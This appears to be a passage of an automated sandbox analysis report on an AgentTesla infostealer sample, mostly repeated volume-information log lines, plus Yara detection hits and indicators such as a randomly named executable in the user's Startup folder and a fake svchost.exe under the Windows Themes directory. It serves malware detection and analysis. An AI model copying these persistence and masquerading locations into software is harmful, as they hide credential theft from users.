                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeQueries volume information: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\srt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000026.00000002.2211744541.0000000004053000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2182891401.0000000004783000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.2165424688.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2180537277.0000000004783000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 38.2.svchost.exe.4053840.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4783840.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.svchost.exe.4098660.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4138660.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.40f3840.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4138660.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.400000.0.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000026.00000002.2211744541.0000000004053000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2182891401.0000000004783000.00000004.00000001.sdmp, type: MEMORY
